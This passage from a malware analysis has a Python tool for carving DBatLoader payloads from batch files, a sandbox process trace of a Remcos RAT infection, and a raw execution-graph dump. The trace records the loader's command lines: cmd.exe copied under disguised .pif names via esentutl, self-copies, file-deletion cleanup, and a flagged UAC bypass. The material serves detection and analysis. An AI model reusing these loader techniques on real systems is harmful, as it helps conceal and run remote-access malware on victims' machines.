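def looks_like_pe(blob: bytes) -> bool:
    """Cheap sanity check: MZ header plus a PE signature at e_lfanew."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(blob[0x3C:0x40], "little")
    return blob[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def build_sample_bat() -> str:
    """Constructed stand-in for the real .bat: a 72-byte fake MZ/PE stub (not
    malware) wrapped exactly the way the two certutil passes expect it."""
    stub = bytearray(0x48)
    stub[0:2] = b"MZ"
    stub[0x3C:0x40] = (0x40).to_bytes(4, "little")
    stub[0x40:0x44] = b"PE\0\0"
    hex_text = binascii.hexlify(bytes(stub)).decode()   # what AnyDesk.jpeg holds
    b64 = base64.b64encode(hex_text.encode()).decode()   # what the .bat holds
    wrapped = "\n".join(b64[i:i + 64] for i in range(0, len(b64), 64))
    return ("@echo off\r\nrem batch logic precedes the blob\r\n"
            "-----BEGIN X509 CRL-----\n" + wrapped + "\n-----END X509 CRL-----\n")


if __name__ == "__main__":
    pe = carve_payload(build_sample_bat())
    print(len(pe), looks_like_pe(pe))
```

Against a real sample, read the .bat as text with errors="ignore" and pass it to carve_payload(); the batch logic in front of the blob is skipped because only the CRL-framed block is consumed, which is also why the "Found large BAT file" signature fires on this family.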

                                                                                        Target ID:10
                                                                                        Start time:01:53:09
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                        Imagebase:0x400000
                                                                                        File size:1'226'752 bytes
                                                                                        MD5 hash:DF6F291F617D9DBAE8F32FB11ECD59C1
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:Borland Delphi
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000003.1426879864.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.1519993639.000000007E810000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.1519993639.000000007E810000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000003.1427511863.000000007F920000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.1498580149.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.1498580149.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 32%, ReversingLabs
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:11
                                                                                        Start time:01:53:09
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Users\Public\alpha.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                                                                                        Imagebase:0x7ff6a0e70000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:12
                                                                                        Start time:01:53:09
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Users\Public\alpha.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S
                                                                                        Imagebase:0x7ff6a0e70000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:14
                                                                                        Start time:01:53:14
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\hgkvgoaF.cmd" "
                                                                                        Imagebase:0xa40000
                                                                                        File size:236'544 bytes
                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:15
                                                                                        Start time:01:53:14
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6ee680000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:16
                                                                                        Start time:01:53:15
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                                                                                        Imagebase:0x380000
                                                                                        File size:352'768 bytes
                                                                                        MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:17
                                                                                        Start time:01:53:15
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                                                                                        Imagebase:0x380000
                                                                                        File size:352'768 bytes
                                                                                        MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:18
                                                                                        Start time:01:53:15
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\\Windows\\System32\\esentutl.exe /y C:\Users\Public\Libraries\AnyDesk.PIF /d C:\\Users\\Public\\Libraries\\Faogvkgh.PIF /o
                                                                                        Imagebase:0x380000
                                                                                        File size:352'768 bytes
                                                                                        MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:19
                                                                                        Start time:01:53:15
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6ee680000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:20
                                                                                        Start time:01:53:16
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Windows\SysWOW64\SndVol.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\System32\SndVol.exe
                                                                                        Imagebase:0x790000
                                                                                        File size:226'712 bytes
                                                                                        MD5 hash:BD4A1CC3429ED1251E5185A72501839B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.3879565990.000000001C118000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.3868017269.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000014.00000002.3868017269.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000014.00000002.3868017269.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 00000014.00000002.3868017269.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                        Has exited:false

                                                                                        Target ID:22
                                                                                        Start time:01:53:29
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Users\Public\Libraries\Faogvkgh.PIF
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\Public\Libraries\Faogvkgh.PIF"
                                                                                        Imagebase:0x400000
                                                                                        File size:1'226'752 bytes
                                                                                        MD5 hash:DF6F291F617D9DBAE8F32FB11ECD59C1
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:Borland Delphi
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 32%, ReversingLabs
                                                                                        Has exited:true

                                                                                        Target ID:23
                                                                                        Start time:01:53:30
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Windows\SysWOW64\SndVol.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\System32\SndVol.exe
                                                                                        Imagebase:0x790000
                                                                                        File size:226'712 bytes
                                                                                        MD5 hash:BD4A1CC3429ED1251E5185A72501839B
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000017.00000002.1635427252.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000017.00000002.1635427252.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000017.00000002.1635427252.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 00000017.00000002.1635427252.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000017.00000002.1661654615.000000002AB37000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Has exited:true

                                                                                        Target ID:24
                                                                                        Start time:01:53:37
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Users\Public\Libraries\Faogvkgh.PIF
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\Public\Libraries\Faogvkgh.PIF"
                                                                                        Imagebase:0x400000
                                                                                        File size:1'226'752 bytes
                                                                                        MD5 hash:DF6F291F617D9DBAE8F32FB11ECD59C1
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:Borland Delphi
                                                                                        Has exited:true

                                                                                        Target ID:25
                                                                                        Start time:01:53:38
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Windows\SysWOW64\SndVol.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\System32\SndVol.exe
                                                                                        Imagebase:0x790000
                                                                                        File size:226'712 bytes
                                                                                        MD5 hash:BD4A1CC3429ED1251E5185A72501839B
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000002.1714791876.0000000000647000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000002.1714933699.00000000027D0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000019.00000002.1714933699.00000000027D0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000019.00000002.1714933699.00000000027D0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 00000019.00000002.1714933699.00000000027D0000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                        Has exited:true


                                                                                          Execution Graph

                                                                                          Execution Coverage:5.5%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:25.8%
                                                                                          Total number of Nodes:1399
                                                                                          Total number of Limit Nodes:30
16972->16996 16976 7ff6a0e966bc _vsnwprintf 16973->16976 16997 7ff6a0e966bc 16974->16997 16977 7ff6a0e95d1d 16976->16977 16978 7ff6a0e95d54 GetCurrentThreadId 16977->16978 16980 7ff6a0e966bc _vsnwprintf 16977->16980 16979 7ff6a0e966bc _vsnwprintf 16978->16979 16981 7ff6a0e95d91 16979->16981 16982 7ff6a0e95d51 16980->16982 16983 7ff6a0e966bc _vsnwprintf 16981->16983 16981->16996 16982->16978 16984 7ff6a0e95db9 16983->16984 16985 7ff6a0e95dd4 16984->16985 16986 7ff6a0e966bc _vsnwprintf 16984->16986 16987 7ff6a0e95def 16985->16987 16988 7ff6a0e966bc _vsnwprintf 16985->16988 16986->16985 16989 7ff6a0e95dff 16987->16989 16990 7ff6a0e95e15 16987->16990 16988->16987 16993 7ff6a0e966bc _vsnwprintf 16989->16993 16991 7ff6a0e95e2b 16990->16991 16992 7ff6a0e95e1d 16990->16992 16995 7ff6a0e966bc _vsnwprintf 16991->16995 16994 7ff6a0e966bc _vsnwprintf 16992->16994 16993->16996 16994->16996 16995->16996 16996->16969 16998 7ff6a0e8363c _vsnwprintf 16997->16998 16999 7ff6a0e966e2 16998->16999 16999->16977 16999->16999 17001 7ff6a0e96c5c 14 API calls 17000->17001 17002 7ff6a0e95a2c 17001->17002 17002->16870 17021 7ff6a0e96bd0 17003->17021 17007 7ff6a0e9629f 17006->17007 17008 7ff6a0e962b3 17006->17008 17009 7ff6a0e96cfc 15 API calls 17007->17009 17010 7ff6a0e96334 ReleaseSemaphore 17008->17010 17011 7ff6a0e962d9 ReleaseSemaphore 17008->17011 17020 7ff6a0e962be 17008->17020 17013 7ff6a0e962ae 17009->17013 17010->17007 17012 7ff6a0e96358 17010->17012 17011->17007 17014 7ff6a0e962f5 ReleaseSemaphore 17011->17014 17015 7ff6a0e96366 ReleaseSemaphore 17012->17015 17012->17020 17013->16882 17013->16887 17017 7ff6a0e96313 GetLastError 17014->17017 17014->17020 17018 7ff6a0e96380 GetLastError 17015->17018 17015->17020 17016 7ff6a0e96d1c 14 API calls 17016->17013 17017->17013 17017->17020 17019 7ff6a0e96393 WaitForSingleObject 17018->17019 17018->17020 17019->17020 17020->17013 17020->17016 17022 7ff6a0e95e68 15 API calls 17021->17022 17023 7ff6a0e96c01 17022->17023 17024 7ff6a0e96a34 14 API 
calls 17023->17024 17025 7ff6a0e96c3b 17024->17025 17025->16898 17029 7ff6a0e96b40 17026->17029 17030 7ff6a0e95e68 15 API calls 17029->17030 17031 7ff6a0e96b71 17030->17031 17032 7ff6a0e96a34 14 API calls 17031->17032 17033 7ff6a0e96baf 17032->17033 17033->16903 17036 7ff6a0e9673e 17035->17036 17037 7ff6a0e968b0 GetProcessHeap 17035->17037 17036->16921 17036->16922 17037->17036 17039 7ff6a0e957aa 17038->17039 17040 7ff6a0e9584a CreateSemaphoreExW 17039->17040 17041 7ff6a0e95895 17040->17041 17042 7ff6a0e95885 17040->17042 17044 7ff6a0e95edc 15 API calls 17041->17044 17043 7ff6a0e9758c 18 API calls 17042->17043 17045 7ff6a0e95890 17043->17045 17044->17045 17046 7ff6a0e958a0 17045->17046 17054 7ff6a0e958c3 CreateSemaphoreExW 17045->17054 17047 7ff6a0e96d1c 14 API calls 17046->17047 17048 7ff6a0e958bc 17047->17048 17049 7ff6a0e88f80 7 API calls 17048->17049 17050 7ff6a0e959bd 17049->17050 17050->16927 17050->16928 17052 7ff6a0e9596f 17055 7ff6a0e9758c 18 API calls 17052->17055 17053 7ff6a0e95980 17056 7ff6a0e95edc 15 API calls 17053->17056 17054->17052 17054->17053 17057 7ff6a0e9597b 17055->17057 17056->17057 17057->17048 17058 7ff6a0e96d1c 14 API calls 17057->17058 17058->17048 17061 7ff6a0e96ea6 17060->17061 17062 7ff6a0e96f0c 17061->17062 17063 7ff6a0e96874 3 API calls 17061->17063 17065 7ff6a0e96f5f 17062->17065 17073 7ff6a0e952f0 17062->17073 17064 7ff6a0e96edb 17063->17064 17064->17062 17066 7ff6a0e96ee3 GetProcessHeap RtlFreeHeap 17064->17066 17065->16811 17066->17062 17069 7ff6a0e952f0 memcpy_s 17070 7ff6a0e96f3d 17069->17070 17077 7ff6a0e9536c 17070->17077 17074 7ff6a0e9530a 17073->17074 17076 7ff6a0e9533f 17073->17076 17075 7ff6a0e95328 memcpy_s 17074->17075 17074->17076 17075->17076 17076->17069 17078 7ff6a0e95390 17077->17078 17079 7ff6a0e953c8 memset 17077->17079 17078->17079 17080 7ff6a0e953ae memcpy_s 17078->17080 17079->17065 17080->17079 17083 7ff6a0e9be30 17097 7ff6a0e7d3f0 17083->17097 17086 7ff6a0e9be70 17090 7ff6a0e9be8e _wcsicmp 17086->17090 
17091 7ff6a0e9be84 17086->17091 17087 7ff6a0e9be52 17125 7ff6a0e73240 17087->17125 17089 7ff6a0e9be6b 17092 7ff6a0e9bea8 17090->17092 17093 7ff6a0e9bebb _wcsicmp 17090->17093 17133 7ff6a0e73278 17091->17133 17128 7ff6a0e8498c 17092->17128 17093->17092 17094 7ff6a0e9bef0 _wcsicmp 17093->17094 17094->17089 17094->17091 17098 7ff6a0e7d810 17097->17098 17099 7ff6a0e7d420 17097->17099 17136 7ff6a0e7b998 17098->17136 17101 7ff6a0e8caad 17099->17101 17102 7ff6a0e7d46e GetProcessHeap HeapAlloc 17099->17102 17103 7ff6a0e73278 166 API calls 17101->17103 17102->17101 17108 7ff6a0e7d49a 17102->17108 17104 7ff6a0e8cab7 17103->17104 17107 7ff6a0e7d515 17117 7ff6a0e7d544 17107->17117 17108->17107 17109 7ff6a0e7d4e8 wcschr 17108->17109 17108->17117 17109->17108 17110 7ff6a0e8ca31 wcschr 17110->17117 17111 7ff6a0e7d54a iswspace 17113 7ff6a0e7d561 wcschr 17111->17113 17111->17117 17112 7ff6a0e7d5ee GetProcessHeap HeapReAlloc 17112->17101 17116 7ff6a0e7d61d GetProcessHeap HeapSize 17112->17116 17113->17117 17114 7ff6a0e7d586 wcschr 17114->17117 17115 7ff6a0e7d6ff iswspace 17115->17117 17118 7ff6a0e7d712 wcschr 17115->17118 17116->17117 17117->17101 17117->17110 17117->17111 17117->17112 17117->17114 17117->17115 17119 7ff6a0e7d668 17117->17119 17120 7ff6a0e7d759 wcschr 17117->17120 17122 7ff6a0e7d6c5 wcschr 17117->17122 17123 7ff6a0e8ca5a wcschr 17117->17123 17165 7ff6a0e89158 RtlCaptureContext RtlLookupFunctionEntry 17117->17165 17170 7ff6a0e9e91c 17117->17170 17118->17117 17121 7ff6a0e88f80 7 API calls 17119->17121 17120->17117 17124 7ff6a0e7d6a0 17121->17124 17122->17117 17123->17117 17124->17086 17124->17087 17531 7ff6a0e732b0 17125->17531 17129 7ff6a0e849ba SetEnvironmentVariableW GetProcessHeap RtlFreeHeap 17128->17129 17130 7ff6a0e849a4 17128->17130 17131 7ff6a0e84a14 5 API calls 17129->17131 17130->17129 17132 7ff6a0e849f1 17131->17132 17132->17089 17134 7ff6a0e732b0 166 API calls 17133->17134 17135 7ff6a0e732a4 17134->17135 17135->17089 17173 7ff6a0e7cd90 17136->17173 17139 
7ff6a0e7b9a6 17139->17107 17140 7ff6a0e9e91c 198 API calls 17141 7ff6a0e7b9b1 memset 17140->17141 17179 7ff6a0e7ca40 17141->17179 17144 7ff6a0e8c3a8 17145 7ff6a0e7b998 199 API calls 17144->17145 17154 7ff6a0e8c41a 17145->17154 17146 7ff6a0e7badb 17146->17144 17149 7ff6a0e7bcef GetFileAttributesW 17146->17149 17151 7ff6a0e7bb05 17146->17151 17147 7ff6a0e7ba4c 17147->17144 17147->17146 17148 7ff6a0e7ba80 wcschr 17147->17148 17150 7ff6a0e7baa0 wcschr 17147->17150 17147->17151 17155 7ff6a0e7bb47 17147->17155 17148->17146 17148->17147 17149->17151 17150->17147 17153 7ff6a0e7bb29 _wcsicmp 17151->17153 17151->17155 17153->17151 17155->17144 17157 7ff6a0e7bb6b 17155->17157 17190 7ff6a0e788a8 17155->17190 17156 7ff6a0e7bc82 iswspace 17156->17157 17159 7ff6a0e7bc99 wcschr 17156->17159 17157->17144 17158 7ff6a0e7bb92 17157->17158 17160 7ff6a0e7bbe2 ??_V@YAXPEAX 17158->17160 17161 7ff6a0e7bbee 17158->17161 17159->17157 17162 7ff6a0e7bc46 17159->17162 17160->17161 17163 7ff6a0e88f80 7 API calls 17161->17163 17162->17144 17162->17156 17162->17157 17164 7ff6a0e7bc01 17163->17164 17164->17107 17166 7ff6a0e89195 RtlVirtualUnwind 17165->17166 17167 7ff6a0e891d7 17165->17167 17166->17167 17203 7ff6a0e88fa4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17167->17203 17204 7ff6a0e9e9b4 17170->17204 17174 7ff6a0e8c84e 17173->17174 17175 7ff6a0e7cda1 GetProcessHeap HeapAlloc 17173->17175 17177 7ff6a0e73278 164 API calls 17174->17177 17175->17174 17176 7ff6a0e7b9a1 17175->17176 17176->17139 17176->17140 17178 7ff6a0e8c858 17177->17178 17180 7ff6a0e7ca59 17179->17180 17181 7ff6a0e7cab8 17179->17181 17194 7ff6a0e89324 17180->17194 17181->17147 17184 7ff6a0e8c6e0 17186 7ff6a0e96d1c 14 API calls 17184->17186 17185 7ff6a0e7ca84 17187 7ff6a0e7ca9b memset 17185->17187 17188 7ff6a0e8c706 ??_V@YAXPEAX 17185->17188 17186->17181 17187->17181 17191 7ff6a0e788fc 17190->17191 17192 7ff6a0e788cf 17190->17192 17191->17162 17192->17191 17193 7ff6a0e788df _wcsicmp 
17192->17193 17193->17192 17195 7ff6a0e89330 17194->17195 17198 7ff6a0e89a6c 17195->17198 17197 7ff6a0e7ca7b 17197->17184 17197->17185 17199 7ff6a0e89a86 malloc 17198->17199 17200 7ff6a0e89a91 17199->17200 17201 7ff6a0e89a77 17199->17201 17200->17197 17201->17199 17202 7ff6a0e89a97 Concurrency::cancel_current_task 17201->17202 17202->17197 17206 7ff6a0e9ea0f 17204->17206 17207 7ff6a0e9e9d9 17204->17207 17205 7ff6a0e9ea67 17234 7ff6a0e9c978 17205->17234 17206->17205 17229 7ff6a0e7af98 17206->17229 17216 7ff6a0e76a48 17207->17216 17211 7ff6a0e9eaae 17213 7ff6a0e9eacf 17211->17213 17249 7ff6a0e83a0c 17211->17249 17212 7ff6a0e9ea6c 17212->17211 17244 7ff6a0e7d208 17212->17244 17217 7ff6a0e76b23 17216->17217 17218 7ff6a0e76a51 17216->17218 17217->17206 17218->17217 17219 7ff6a0e9417c 17218->17219 17220 7ff6a0e76ab2 17218->17220 17324 7ff6a0e9ec14 memset 17219->17324 17255 7ff6a0e83c24 17220->17255 17231 7ff6a0e7afb1 17229->17231 17230 7ff6a0e7afdb 17230->17206 17231->17230 17233 7ff6a0e7d208 _close 17231->17233 17529 7ff6a0e7b038 _dup2 17231->17529 17233->17231 17235 7ff6a0e9ca9e 17234->17235 17236 7ff6a0e9c98e 17234->17236 17235->17212 17237 7ff6a0e9ee4c TerminateProcess GetLastError 17236->17237 17243 7ff6a0e9c9b3 17236->17243 17237->17236 17238 7ff6a0e85cb4 7 API calls 17238->17243 17239 7ff6a0e9ca21 _get_osfhandle FlushFileBuffers 17241 7ff6a0e7b038 _dup2 17239->17241 17240 7ff6a0e7d208 _close 17240->17243 17241->17243 17242 7ff6a0e7b038 _dup2 17242->17243 17243->17235 17243->17238 17243->17239 17243->17240 17243->17242 17245 7ff6a0e7d246 17244->17245 17246 7ff6a0e7d211 17244->17246 17245->17212 17247 7ff6a0e7d238 _close 17246->17247 17248 7ff6a0e8ca0e 17246->17248 17247->17245 17248->17212 17250 7ff6a0e83a53 FindClose 17249->17250 17253 7ff6a0e83a25 17249->17253 17251 7ff6a0e83a74 GetLastError 17250->17251 17252 7ff6a0e83a66 17250->17252 17251->17252 17252->17211 17253->17250 17254 7ff6a0e8ec38 17253->17254 17256 7ff6a0e83c67 17255->17256 17257 7ff6a0e8412c 
17256->17257 17258 7ff6a0e7ca40 17 API calls 17256->17258 17259 7ff6a0e88f80 7 API calls 17257->17259 17260 7ff6a0e83c94 17258->17260 17261 7ff6a0e76abf GetProcessHeap RtlFreeHeap 17259->17261 17262 7ff6a0e8ec97 17260->17262 17345 7ff6a0e7b900 17260->17345 17320 7ff6a0e76b84 SetEnvironmentStringsW GetProcessHeap RtlFreeHeap 17261->17320 17263 7ff6a0e8855c ??_V@YAXPEAX 17262->17263 17265 7ff6a0e8eca1 17263->17265 17267 7ff6a0e83cb8 GetCurrentDirectoryW towupper iswalpha 17269 7ff6a0e83fb8 17267->17269 17270 7ff6a0e83d68 17267->17270 17272 7ff6a0e83fc6 GetLastError 17269->17272 17270->17269 17271 7ff6a0e83d72 towupper GetFullPathNameW 17270->17271 17271->17272 17273 7ff6a0e83dd3 17271->17273 17371 7ff6a0e8855c 17272->17371 17275 7ff6a0e83fe0 17273->17275 17292 7ff6a0e83de3 17273->17292 17277 7ff6a0e8855c ??_V@YAXPEAX 17275->17277 17276 7ff6a0e840fe 17278 7ff6a0e8855c ??_V@YAXPEAX 17276->17278 17279 7ff6a0e83ffb _local_unwind 17277->17279 17280 7ff6a0e84108 _local_unwind 17278->17280 17281 7ff6a0e8400c GetLastError 17279->17281 17282 7ff6a0e83f98 17280->17282 17283 7ff6a0e84028 17281->17283 17284 7ff6a0e83e95 17281->17284 17374 7ff6a0e7ff70 17282->17374 17283->17284 17287 7ff6a0e84031 17283->17287 17285 7ff6a0e83ecf 17284->17285 17349 7ff6a0e82978 17284->17349 17289 7ff6a0e83f08 17285->17289 17290 7ff6a0e83ed5 GetFileAttributesW 17285->17290 17294 7ff6a0e8855c ??_V@YAXPEAX 17287->17294 17300 7ff6a0e83f1e SetCurrentDirectoryW 17289->17300 17304 7ff6a0e83f46 17289->17304 17297 7ff6a0e83efd 17290->17297 17298 7ff6a0e84067 GetLastError 17290->17298 17292->17276 17293 7ff6a0e83e66 GetFileAttributesW 17292->17293 17293->17281 17293->17284 17295 7ff6a0e8403b _local_unwind 17294->17295 17301 7ff6a0e8404c 17295->17301 17296 7ff6a0e83ec7 17296->17285 17296->17301 17297->17289 17303 7ff6a0e8409d 17297->17303 17302 7ff6a0e8855c ??_V@YAXPEAX 17298->17302 17299 7ff6a0e8855c ??_V@YAXPEAX 17299->17257 17300->17304 17305 7ff6a0e840b8 GetLastError 17300->17305 17306 7ff6a0e8855c 
